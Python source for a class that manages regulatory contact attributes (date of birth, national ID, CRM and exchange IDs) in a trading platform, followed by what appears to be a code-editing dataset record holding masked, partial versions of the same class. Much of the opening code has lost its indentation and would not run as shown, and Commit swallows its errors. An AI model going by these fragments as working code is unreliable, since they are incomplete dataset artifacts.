raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
try:
self.__contact.AdditionalInfo().RegContExchangeId(self.__reg_exchange_id)
except:
pass
else:
if not self.__reg_exchange_id:
self.__reg_exchange_id = None
return self.__reg_exchange_id
def UniqueName(self, unique_name = VALUE_NOT_SET):
"""An optional unique name, if specified there can only be one contact with this name for each party."""
if unique_name != VALUE_NOT_SET:
try:
if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() >= 2017.2:
self.__contact.UniqueName(unique_name)
else:
is_unique, contact_name = FRegulatoryUtils.is_unique_name(self.__contact, unique_name)
if is_unique:
try:
self.__contact.AdditionalInfo().UniqueName(unique_name)
except:
pass
else:
msg = "The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name."%(unique_name, self.__contact.Fullname(), self.__contact.Party().Name(), contact_name)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
self.__reg_unique_name = unique_name
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
else:
if not self.__reg_unique_name:
self.__reg_unique_name = None
return self.__reg_unique_name
def ClientType(self):
"""returns the ClientType based on where the CrmId is found on the linked objects"""
self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
return self.__client_type
def JointAccount(self):
"""Another trader that jointly owns the account with this trader"""
joint_accounts = []
if self.IsGeneralPartner():
for contact in self.__contact.Party().Contacts():
if contact.AdditionalInfo().RegGeneralPartner():
joint_accounts.append(contact)
else:
FRegulatoryLogger.WARN(logger, "<%s> is not a General Partner. Hence JointAccount is None"%self.__contact.Fullname())
joint_accounts = None
return joint_accounts
def IsGeneralPartner(self, is_general_partner = VALUE_NOT_SET):
"""General partner has responsibility for the actions of the business, can legally bind
the business and is personally liable for all the business's debts and obligations."""
if is_general_partner != VALUE_NOT_SET:
self.__is_general_partner = FRegulatoryUtils.get_bool(is_general_partner, 'IsGeneralPartner')
FRegulatoryLogger.DEBUG(logger, "The IsGeneralPartner is being set to <%s>."%(str(self.__is_general_partner)))
try:
self.__contact.AdditionalInfo().RegGeneralPartner(self.__is_general_partner)
except:
pass
else:
if str(self.__is_general_partner) == "None":
FRegulatoryLogger.DEBUG(logger, "The IsGeneralPartner is None. Hence defaulting it to False")
self.__is_general_partner = False
return self.__is_general_partner
def __setattr__(self, attr, val):
if attr.startswith('_'):
super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
else:
if hasattr(self, attr):
getattr(self, attr)(val)
    def Commit(self):
        """Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact"""
        # Runs inside one ACM transaction so the contact and its regulatory
        # AdditionalInfos persist atomically.
        try:
            acm.BeginTransaction()
            self.__contact.Commit()
            # On ACM versions older than 2015.4 each AdditionalInfo value is
            # written out explicitly here; presumably newer versions persist
            # them via contact.Commit() itself — TODO confirm.
            if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() < 2015.4:
                self.__integration_utils.set_additional_info('DateOfBirth', self.__contact, self.__reg_date_of_birth)
                self.__integration_utils.set_additional_info('FirstName', self.__contact, self.__reg_first_name)
                self.__integration_utils.set_additional_info('LastName', self.__contact, self.__reg_last_name)
                self.__integration_utils.set_additional_info('NationalId', self.__contact, self.__reg_national_id)
                self.__integration_utils.set_additional_info('RegContactCrmId', self.__contact, self.__reg_crm_id)
                self.__integration_utils.set_additional_info('RegContExchangeId', self.__contact, self.__reg_exchange_id)
                self.__integration_utils.set_additional_info('UniqueName', self.__contact, self.__reg_unique_name)
                self.__integration_utils.set_additional_info('RegGeneralPartner', self.__contact, self.__is_general_partner)
            acm.CommitTransaction()
        except Exception as e:
            # Any failure aborts the whole transaction. NOTE(review): the
            # exception is logged but swallowed, not re-raised — callers
            # cannot tell the commit failed.
            FRegulatoryLogger.ERROR(logger, str(e))
            FRegulatoryLogger.ERROR(logger, "ABORTING TRANSACTION***********")
            acm.AbortTransaction()
def Delete(self):
"""Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
FRegulatoryUtils.Delete(self.__contact, "Contact")
FRegulatoryLogger.DEBUG(logger, "Deleted all AdditionalInfos on Contact related to Regulatory Reporting")
def Attributes(self):
"""returns the attributes on the FContactRegulatoryInfoBase instance"""
return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
def RegulatoryInfo(self):
"""returns the FContactRegulatoryInfoBase instance for the given contact"""
conactRegInfo = FContactRegulatoryInfo(self)
return conactRegInfo
def Select(query):
"""Return a collection of FContactRegulatoryInfoBase instances matching constraint specified in the Select query"""
party = None
if query.find('and party') != -1:#it means there is an additional condition added
pos = query.find('and party')
party_name = query[(pos + len('and party')):]
query = query[0:pos]
party_name = party_name.replace('=', '').replace("'", '')
party_name = party_name.strip()
party = acm.FParty[party_name]
return_result = FRegulatoryUtils.Select(query, "FContact", party)
return return_result
|
flexible
|
{
"blob_id": "d4e62950f10efeb27d19c3d9c672969342ef8c7c",
"index": 3095,
"step-1": "<mask token>\n\n\nclass FContactRegulatoryInfoBase(object):\n\n def __init__(self, contact=None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger,\n 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'\n )\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n <mask token>\n <mask token>\n\n def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):\n \"\"\"Date of birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = (\n 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'\n % reg_date_of_birth)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.\n __reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name=VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name\n )\n 
except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name=VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id=VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.\n __reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id=VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.\n __reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n <mask token>\n\n def UniqueName(self, unique_name=VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if (FIntegrationUtils.FIntegrationUtils.\n get_acm_version_override() >= 2017.2):\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(\n self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(\n unique_name)\n except:\n pass\n else:\n msg = (\n 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. 
Another contact <%s> already has this unique name.'\n % (unique_name, self.__contact.Fullname(),\n self.__contact.Party().Name(), contact_name))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n <mask token>\n\n def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(\n is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \n 'The IsGeneralPartner is being set to <%s>.' % str(self.\n __is_general_partner))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.\n __is_general_partner)\n except:\n pass\n else:\n if str(self.__is_general_partner) == 'None':\n FRegulatoryLogger.DEBUG(logger,\n 'The IsGeneralPartner is None. 
Hence defaulting it to False'\n )\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n elif hasattr(self, attr):\n getattr(self, attr)(val)\n <mask token>\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, 'Contact')\n FRegulatoryLogger.DEBUG(logger,\n 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'\n )\n\n def Attributes(self):\n \"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FContactRegulatoryInfoBase(object):\n\n def __init__(self, contact=None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger,\n 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'\n )\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n\n def __refresh(self, contact):\n self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(\n 'dateOfBirth', self.__contact)\n self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',\n self.__contact)\n self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',\n self.__contact)\n self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(\n 'nationalId', self.__contact)\n self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(\n 'regGeneralPartner', self.__contact)\n self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(\n 'regContactCrmId', self.__contact)\n self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(\n 'regContExchangeId', self.__contact)\n try:\n self.__reg_unique_name = self.__contact.UniqueName()\n except:\n self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(\n 'uniqueName', self.__contact)\n <mask token>\n\n def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):\n \"\"\"Date of birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob 
= ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = (\n 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'\n % reg_date_of_birth)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.\n __reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name=VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name\n )\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name=VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id=VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.\n __reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id=VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.\n __reg_crm_id)\n except:\n pass\n 
else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n\n def ExchangeId(self, exchange_id=VALUE_NOT_SET):\n \"\"\"The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged.\"\"\"\n if exchange_id != VALUE_NOT_SET:\n if str(exchange_id).isdigit():\n self.__reg_exchange_id = int(exchange_id)\n elif str(exchange_id) in ['None', '']:\n self.__reg_exchange_id = None\n else:\n msg = (\n 'The ExchangeId provided <%s> is not of the expected integer format'\n % str(exchange_id))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n try:\n self.__contact.AdditionalInfo().RegContExchangeId(self.\n __reg_exchange_id)\n except:\n pass\n else:\n if not self.__reg_exchange_id:\n self.__reg_exchange_id = None\n return self.__reg_exchange_id\n\n def UniqueName(self, unique_name=VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if (FIntegrationUtils.FIntegrationUtils.\n get_acm_version_override() >= 2017.2):\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(\n self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(\n unique_name)\n except:\n pass\n else:\n msg = (\n 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. 
Another contact <%s> already has this unique name.'\n % (unique_name, self.__contact.Fullname(),\n self.__contact.Party().Name(), contact_name))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n <mask token>\n\n def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(\n is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \n 'The IsGeneralPartner is being set to <%s>.' % str(self.\n __is_general_partner))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.\n __is_general_partner)\n except:\n pass\n else:\n if str(self.__is_general_partner) == 'None':\n FRegulatoryLogger.DEBUG(logger,\n 'The IsGeneralPartner is None. 
Hence defaulting it to False'\n )\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n elif hasattr(self, attr):\n getattr(self, attr)(val)\n <mask token>\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, 'Contact')\n FRegulatoryLogger.DEBUG(logger,\n 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'\n )\n\n def Attributes(self):\n \"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FContactRegulatoryInfoBase(object):\n\n def __init__(self, contact=None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger,\n 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'\n )\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n\n def __refresh(self, contact):\n self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(\n 'dateOfBirth', self.__contact)\n self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',\n self.__contact)\n self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',\n self.__contact)\n self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(\n 'nationalId', self.__contact)\n self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(\n 'regGeneralPartner', self.__contact)\n self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(\n 'regContactCrmId', self.__contact)\n self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(\n 'regContExchangeId', self.__contact)\n try:\n self.__reg_unique_name = self.__contact.UniqueName()\n except:\n self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(\n 'uniqueName', self.__contact)\n\n def Contact(self):\n \"\"\"returns the contact for which this wrapper has all the addinfo/column values\"\"\"\n return self.__contact\n\n def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):\n \"\"\"Date of 
birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = (\n 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'\n % reg_date_of_birth)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.\n __reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name=VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name\n )\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name=VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id=VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.\n __reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id=VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n 
self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.\n __reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n\n def ExchangeId(self, exchange_id=VALUE_NOT_SET):\n \"\"\"The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged.\"\"\"\n if exchange_id != VALUE_NOT_SET:\n if str(exchange_id).isdigit():\n self.__reg_exchange_id = int(exchange_id)\n elif str(exchange_id) in ['None', '']:\n self.__reg_exchange_id = None\n else:\n msg = (\n 'The ExchangeId provided <%s> is not of the expected integer format'\n % str(exchange_id))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n try:\n self.__contact.AdditionalInfo().RegContExchangeId(self.\n __reg_exchange_id)\n except:\n pass\n else:\n if not self.__reg_exchange_id:\n self.__reg_exchange_id = None\n return self.__reg_exchange_id\n\n def UniqueName(self, unique_name=VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if (FIntegrationUtils.FIntegrationUtils.\n get_acm_version_override() >= 2017.2):\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(\n self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(\n unique_name)\n except:\n pass\n else:\n msg = (\n 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. 
Another contact <%s> already has this unique name.'\n % (unique_name, self.__contact.Fullname(),\n self.__contact.Party().Name(), contact_name))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n\n def JointAccount(self):\n \"\"\"Another trader that jointly owns the account with this trader\"\"\"\n joint_accounts = []\n if self.IsGeneralPartner():\n for contact in self.__contact.Party().Contacts():\n if contact.AdditionalInfo().RegGeneralPartner():\n joint_accounts.append(contact)\n else:\n FRegulatoryLogger.WARN(logger, \n '<%s> is not a General Partner. Hence JointAccount is None' %\n self.__contact.Fullname())\n joint_accounts = None\n return joint_accounts\n\n def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(\n is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \n 'The IsGeneralPartner is being set to <%s>.' % str(self.\n __is_general_partner))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.\n __is_general_partner)\n except:\n pass\n else:\n if str(self.__is_general_partner) == 'None':\n FRegulatoryLogger.DEBUG(logger,\n 'The IsGeneralPartner is None. 
Hence defaulting it to False'\n )\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n elif hasattr(self, attr):\n getattr(self, attr)(val)\n\n def Commit(self):\n \"\"\"Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact\"\"\"\n try:\n acm.BeginTransaction()\n self.__contact.Commit()\n if FIntegrationUtils.FIntegrationUtils.get_acm_version_override(\n ) < 2015.4:\n self.__integration_utils.set_additional_info('DateOfBirth',\n self.__contact, self.__reg_date_of_birth)\n self.__integration_utils.set_additional_info('FirstName',\n self.__contact, self.__reg_first_name)\n self.__integration_utils.set_additional_info('LastName',\n self.__contact, self.__reg_last_name)\n self.__integration_utils.set_additional_info('NationalId',\n self.__contact, self.__reg_national_id)\n self.__integration_utils.set_additional_info('RegContactCrmId',\n self.__contact, self.__reg_crm_id)\n self.__integration_utils.set_additional_info(\n 'RegContExchangeId', self.__contact, self.__reg_exchange_id\n )\n self.__integration_utils.set_additional_info('UniqueName',\n self.__contact, self.__reg_unique_name)\n self.__integration_utils.set_additional_info(\n 'RegGeneralPartner', self.__contact, self.\n __is_general_partner)\n acm.CommitTransaction()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n FRegulatoryLogger.ERROR(logger, 'ABORTING TRANSACTION***********')\n acm.AbortTransaction()\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, 'Contact')\n FRegulatoryLogger.DEBUG(logger,\n 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'\n )\n\n def Attributes(self):\n 
\"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass FContactRegulatoryInfoBase(object):\n\n def __init__(self, contact=None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger,\n 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'\n )\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n\n def __refresh(self, contact):\n self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(\n 'dateOfBirth', self.__contact)\n self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',\n self.__contact)\n self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',\n self.__contact)\n self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(\n 'nationalId', self.__contact)\n self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(\n 'regGeneralPartner', self.__contact)\n self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(\n 'regContactCrmId', self.__contact)\n self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(\n 'regContExchangeId', self.__contact)\n try:\n self.__reg_unique_name = self.__contact.UniqueName()\n except:\n self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(\n 'uniqueName', self.__contact)\n\n def Contact(self):\n \"\"\"returns the contact for which this wrapper has all the addinfo/column values\"\"\"\n return self.__contact\n\n def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):\n \"\"\"Date of 
